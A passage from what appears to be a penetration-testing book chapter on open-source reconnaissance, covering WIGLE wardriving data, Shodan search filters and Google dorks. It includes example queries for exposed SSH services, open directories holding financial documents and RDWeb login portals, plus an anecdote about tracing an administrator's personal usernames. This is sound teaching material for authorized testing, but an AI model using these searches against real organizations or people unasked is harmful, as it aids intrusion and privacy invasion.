Yikes. That looks like my report card from my sophomore year of high school (sorry, Mom and Dad). In this particular assessment, I was able to use this information to pull off some successful cross-site scripting, clickjacking, and formjacking attacks. I could have figured this out manually, of course, but the time saved increases the value you provide to your client.

This is an example of a real-time test of public resources provided by your target – we asked this particular service to visit the website now and tell us what it sees. Another way to look at this pre-Kali stage of OSINT is to gather the information that has already been gathered by all of those crawlers taking peeks at every corner of the internet, 24/7/365. We need to be aware of the difference, as the information we find from such resources is not real-time and may not be accurate at the time of your assessment.

Open source wireless analysis with WIGLE

I would never forgive myself if I didn’t mention wigle.net in the context of open source digging with sites that did the probing for us already. This one is special, though – it’s a true crowd-sourced initiative. Resources like Shodan are organizations that own their probing and crawling machines. Their game is to give you access to the database they built with their own hardware. WIGLE, on the other hand, is a collection of what the world of volunteer wardrivers have gathered with their own hardware and mode of transportation.

Note

If the term is unfamiliar, wardriving refers to the practice of moving around an area with a device configured to detect and report wireless networks. The name suggests driving a car, as that’s a great way to cover larger areas, but you can also go warbiking, warwalking, or even send out a wardrone or a warkitteh (a man attached Wi-Fi sniffing hardware to his outdoor cat’s collar). I’m still not sure if warscooting is a thing yet.

At the time of writing, wigle.net contains information about 745 million networks, gathered from 10.5 billion individual observations. The key to the observations is the combination of device reconnaissance and GPS data, allowing you to place the observation on a map. Keep in mind, these locations are where the observation was made, not the location of the access point. This becomes clear when you zoom in on the map, as shown here:

Figure 1.8 – Zooming in on a neighborhood on wigle.net

You can see the observations largely center on roads, suggesting that the observers are driving around with their laptops or smartphones. But you can also see spots in the middle of wide-open spaces, like Firefighters Park in the preceding screenshot, or even in the middle of the ocean, as shown in the following screenshot:

Figure 1.9 – Wardriving observations from the North Atlantic

These observations likely correspond to shipping lanes or even airways. This should give you an idea of the sheer size of this dataset.

Where it will be useful to you, as an intrepid open source investigator, is gathering information about wireless networks without setting foot near the site. With some clients, this won’t really mean much. But for others who may be physically spread out, like with a massive data center or numerous individual facilities, some recon on the location of certain networks may come in useful. Again, by location, we mean the area where an observation was possible. Wireless networks are low-power, and most wardrivers aren’t packing exceptionally high-gain antennas while driving around, so you can assume you’ll be within a block or two, if not closer.

The world of Shodan

There is a site you probably already know about, and if you don’t, prepare to spend a few hours exploring its treasures: shodan.io. Back in my day, when you saw a device firing off frames on the wire, you knew it was a computer. Today, a surprising variety of devices are network-capable, and your refrigerator may very well be another budding leaf at the end of sprawling branches of this global tree we call the internet. The rapid proliferation of this connectedness and its penetration into our daily lives is concerning for us security nerds, but we’re not going to wax philosophical today. The point is, it occurred to some clever folks along the way that crawling the internet to see what’s open and ready to chat will be very interesting as new leaves start popping up. Enter Shodan.

The name started as an acronym from a classic 1990s video game series, System Shock. SHODAN stands for Sentient Hyper-Optimized Data Access Network. In a classic sci-fi turn of events, SHODAN was originally artificial intelligence whose purpose was to help people …but something went wrong. You get the idea. Think Skynet from the Terminator series or V.I.K.I. from I, Robot. The AI goes wonky and decides humans are mere infestuous bugs for squashing. The common thread is that the AI was granted entirely too much access to global systems in order for it to do its job. As SHODAN grabbed control over numerous disparate systems, shodan.io’s creator John Matherly figured it’s an appropriate reference.

To be clear, Shodan isn’t a website that is hell-bent on the annihilation of all humankind (but that would be an awesome movie). The “disparate systems” part is the all-too-creepy reference here, as Shodan crawls the internet, just poking around the unlocked doors tucked away in the back alleyways. If you want to find webcams, a fridge that’s running low on milk, or – more terrifyingly – SCADA systems inside massive plants, then Shodan is the place to check it out. What the hacker in you should be realizing is something like, what about an SSH server on unexpected ports, in an attempt to hide in plain sight? Excellent thinking. We want to focus on our client’s resources that were already sniffed by someone else. Suppose your client really is running SSH on port 2222 (this is surprisingly common, as Shodan will show you). We have a head start on the discovery phase of our assessment, and once again, we didn’t send any packets. A Shodan crawler sent the packets.

The general principle here is banner grabbing. Banners are nothing more than text-based messages that greet the client connecting to a particular service. They’re useful for the rightful administrators of these servers to catalog assets and troubleshoot problems. Suppose you have a large inventory of servers hosting a particular service and you want to validate the version that’s running on each host. You could type up a small script that will initiate those connections, find the version number in the banner, and put it all in a tidy list on your screen. They are also extremely useful for narrowing our focus while we are developing the attack on our target. We’ll see hands-on banner grabbing later when we’re sitting down at Kali. In the meantime, we’re going to take advantage of the fact that someone has already taken a look at what the internet looks like down to the service level, and our job is to see what our client is telling the world. You’ll be surprised again and again during assessments by how much the clients do not know about what’s floating around out there with their name on it.

Is banner grabbing a worthy finding for a pen test?

Findings are graded by their overall risk rating. Businesses consider a couple of things when it comes to risk management: how likely and how impactful a compromise would be. Is a vulnerability very unlikely to be exploited, and if it is, will it threaten the entire organization? That’s going to be considered higher risk. Banner grabbing would fall in the category of very likely (due to its simplicity), and very low impact. Remember that an important part of your job is educating your client on how these things work. Yes, it will be one of the low-risk findings. But if your banner grab narrowed your focus and saved you time, thus giving you more time after the compromise to do even more movement and loot-grabbing, it belongs in the report. It’s a part of the attack!

Shodan search filters

You can start simple, such as punching in an IP address or a service name. For example, we could try Remote Desktop Protocol (RDP) or Samba. To turn this global eye into a fine-tuned microscope, however, we need to apply search filters. The format is very simple: you merely separate the name of the filter from its query with a colon (:). A real handy way to fine-tune your results is to negate a particular query by putting a dash (-) before the filter name. Let’s take a look at the filters available to us, and then we’ll go over some examples.

asn: Search by autonomous system number. An autonomous system (AS) is a group of IP prefixes operated by one or more entities for maintaining one clear routing policy, allowing these entities to exchange routes with other ISPs. This search is useful when you are looking for hosts under the control of one or more such entities as defined by their assigned ASN.city: Search by the city where the host is located.country: Search by country with alpha-2 codes as per the ISO3166 standard.geo: Allows you to specify geographical coordinates. Linking a specific host to its geographical coordinates is notoriously iffy, so it’s best to establish a range with this filter. Draw a box over the area you want to search and grab the lat/lon pairs for the top-left corner of the box and the lower-right corner of the box. For example, searching geo:12.63,-70.10,12.38,-69.82 will return results anywhere on the island of Aruba.has_ipv6: Searches for IPv6 support; expects true (or 1) or false (or 0).has_screenshot: Returns results where a screenshot was captured. This is useful for things such as RDP and VNC. Expects the Boolean true/false (1/0).has_ssl: Shows services with SSL support. Expects true (or 1) or false (or 0).hash: Each page that’s grabbed by Shodan is hashed. This could be handy for looking for pages with the exact same text on them, but you’ll probably use this with the negation dash (-) and a zero to skip results where the banners are blank, like this: -hash:0.hostname: Specify the hostname or just a part of it.ip: The same as net, this lets you specify an IP range in CIDR format.isp: Take a look at a specific ISP’s networks.net: The same as ip – this lets you specify an IP range in CIDR format.org: This is where you specify the organization’s name.os: Very handy indeed – specify the operating system.port: Check specific ports. Negating this filter is especially useful for finding services that are operating on non-standard ports. For example, ssh -port:22 will find all instances of SSH on anything other than the standard SSH port.product: A crucial option for narrowing down a specific product running the service. For example, product:Apache -port:80,443 will find any Apache server on non-standard ports.version: Useful for targeting specific product version numbers.

Note

We’re covering the filters that are available to basic users. There are more sophisticated filters available to small business and enterprise accounts if such a thing is within your budget.

Let’s take a look at how we can whittle away at our results and home in on what we need. First, let’s say our target is in Mexico City:

city:"Mexico City"

On second thought, I want to make sure I cover the region around and including Mexico City. So, I’ll try this instead:

geo:19.58,-99.37,19.21,-98.79

Now, I want to look for SSH on any non-standard port:

geo:19.58,-99.37,19.21,-98.79 ssh -port:22

And I only want Debian hosts:

geo:19.58,-99.37,19.21,-98.79 ssh -port:22 os:Debian

Finally, suppose I know the subnet for my target is 187.248.0.0/17:

geo:19.58,-99.37,19.21,-98.79 ssh -port:22 os:Debian net:187.248.0.0/17

With that, I hit Enter and see what Shodan has in store for me:

Figure 1.10 – Homing in on my targets

When I started looking at the Mexico City region, I had 1.5 million results to sift through. My fine-tuning reduced that list to only two servers. This is a fully random example for demonstration purposes – when you’re researching for a specific client, you’ll be trying the org filter, perhaps the asn filter, and whatever else you have to go on.

Google’s dark side

Our last stop for goodies before we arrive at the desk where Kali eagerly awaits is Google. No, we’re not going to check the weather or find out why we call those spiky animals porcupines (apparently, it’s the Latin porcus (hog) and spina (thorn, spine) –who knew?). We’ll leverage the surgical scalpel of Google searching: operators. Keep the same spirit from Shodan – separate the operator from the query with a colon (:) and no spaces. Google, however, allows us to get pretty advanced.

Badda-bing

The concepts here apply to the Bing search engine as well (though you’ll want to review the operator specifics on their help pages). As a distinct search engine, you may find results on Bing that you won’t find on Google, and vice versa. It’s worth checking all your options!

Google’s advanced operators

Let’s first discuss what makes up an ordinary web page. Of course, you have the URL to type into your browser and to share with your friends. Then, you have the title of the page, and the distinction is technical – it will be explicitly formatted this way with the <title> tag in HTML. You’ll also have the text of the page, which is basically everything written on the page that isn’t the title or the URL. There are three reasons why we pen testers care about this:

Google can find stuff left on pages by administrators who may have neglected to understand the public nature of their posts – including talking about specific clients and the products they manage.Google can find stuff left on pages by bad guys who may have already compromised your client, a partner, or an employee.Services with web portals will have signatures that can distinguish them. The use of specific words (such as admin) in the URL, or a product, version, or company name in the text of the page, and so on.

Google is designed for the average user, using its snazzy algorithm to find what you want, and even what you didn’t realize you wanted. However, it is ready for the advanced user, too. You just need to know what to say to it. There are two ways of doing this: with operators directly, or within the Advanced Search feature. Let’s take a look at the different operators for direct use:

intitle: Return pages with your query within the page title.inurl: Return pages with your query inside the URL to the page itself.allintitle: The allin queries are special – they will only return results that contain all of your multiple keywords. For example, allintitle:"Satoshi" "identity" "bitcoin" "conspiracy" will return pages that contain all four words somewhere in the title, but not pages that have only three of those words in the title.allinurl: This will only return results where all of your terms are contained in the URL.allintext: Return only the pages that contain all of your terms in the text of the page.filetype: A particularly powerful option that lets you specify the file type. For example, filetype:pdf will return PDF documents with your search criteria.link: Another special fine-tuning option, this searches for pages that contain links to the URL or domain you specify here.

Just like with Shodan, you can negate an option with a dash (-). For example, I can look for the word explorer and avoid pages about the car with explorer –ford. You can also look for the pages that maybe contain one or more of several terms (as opposed to the allin options) with the OR operator. For example, the following will only return pages with all four terms in quotation marks:

allintext:"Satoshi" "identity" "bitcoin" "conspiracy"

However, the next example will return pages that mention any of the terms:

"Satoshi" OR "identity" OR "bitcoin" OR "conspiracy"

A useful shorthand for OR, by the way, is the pipe character (|). So, this is identical to the previous search:

"Satoshi" | "identity" | "bitcoin" | "conspiracy"

The Advanced Search page

Google has made things a little more user-friendly – just add advanced_search after the google.com URL, as shown in the following screenshot:

Figure 1.11 – Google’s Advanced Search window

For some advanced search capabilities, this accomplishes the same thing as putting the operators directly into the search box. However, narrowing results down to a specific date range is best done from the results page. First, enter your search query, then, click Tools followed by the Any time dropdown to select a custom range, as shown here:

Figure 1.12 – Customizing the date range for my results

I remember needing to use the daterange: operator with Julian dates. In other words, Christmas Day of 2020 was on Julian Day 2,459,209. Trust me, using a graphical calendar is much less annoying.

Thinking like a dark Googler

I’ve had a lot of financial organizations as pen test clients. The nature of their business involves a lot of paperwork, so it’s particularly tricky to keep everything tidy. Let’s take a look at a possible Google hacking mission, in this case, digging up financial information. Of course, for your needs, you’ll be using your client’s name or the name of an employee to accompany your fine-tuned search terms.

First, I try the following:

intitle:"index of" "Parent Directory" ".pdf" "statement"

Let’s break this down. By looking for index of with the words Parent Directory somewhere on the page, I’ll be finding exposed file directories that are hosted via HTTP/S. I’m also looking for any text with .pdf in it, which will catch directories hosting PDF files. Finally, I’m hoping someone will have put the word statement somewhere in their filename. As you can imagine, we’ll probably grab some false positives with this. But you may also find things like this, which I’m fairly certain was not intended to be sitting on the open web:

Figure 1.13– The result of searching through public directories

Looks like someone’s going on a trip! This find didn’t have statement in its filename, but the files next to it did. When I click Parent Directory on some of these pages, I end up at the home page for the domain or a 404 page, strongly suggesting that these exposed directories are accidents. There’s nothing quite like a false sense of security to help you out in your endeavor. Finding an employee’s passports, tax returns, and the like, before you even sit down with your Kali toolkit, is a powerful message for your client’s management.

There are plenty of resources online to help you with sneaky Google searches. The Google Hacking Database over at the Exploit Database (exploit-db.com) is an excellent place to check out. I won’t rehash all the different searches you could try. The key lesson here is to apply whatever information you have on your client and try thinking in terms of how a resource presents itself to the internet. For example, I had a client for whom my initial research suggested the presence of a Remote Desktop portal. Searching the client’s domain with this was helpful:

inurl:RDWeb/Pages/en-US/login.aspx

How did I come up with that? Simple: I researched how these devices work. Find one, talk to it with your browser, and build a Google query with your client’s information. Have you considered your client’s IT support? We all need to ask for help now and then. Perhaps some of the IT staff at your client have asked for support online. Hmm, I'm not sure, a helpful compatriot replies, can you upload a packet dump from the device? Next thing you know, information deeply internal to your client has been exfiltrated to the web. I’ve seen it with clients more times than I’d like to admit. Just look for those communities and try combining parts of the URLs with inurl. For example, if you see your client’s name pop up along with the following, then you have a head start on the security software they may be using:

inurl:"broadcom.com/enterprisesoftware/communities"

An important skill with something as inherently hit-or-miss as OSINT is outside-the-box thinking. Suppose you’ve tried all of the Google tricks you can think of, looking for different vendors and URL strings, and you’ve come up dry. Well, do you know anything about the people who work there? I once had a client whose IT administrator had a unique name in her personal email address.

It didn’t take long before I linked this to a different username that she had used on Yahoo! in the past. I took this username and tried all kinds of search combinations, and boom – an obscure forum for the administrators of a highly specific operating system in an enterprise environment had posts from a user with this same name. She was careful enough to avoid mentioning her employer, which is why the usual searches described previously didn’t get me there. But I was able to connect the dots and determine she was indeed referring to the configuration of these hosts inside the network of my client, and later I could even correlate independent findings with information in these public posts. The connection that brought me to that information was just her use of an old Yahoo!Messenger name when anonymously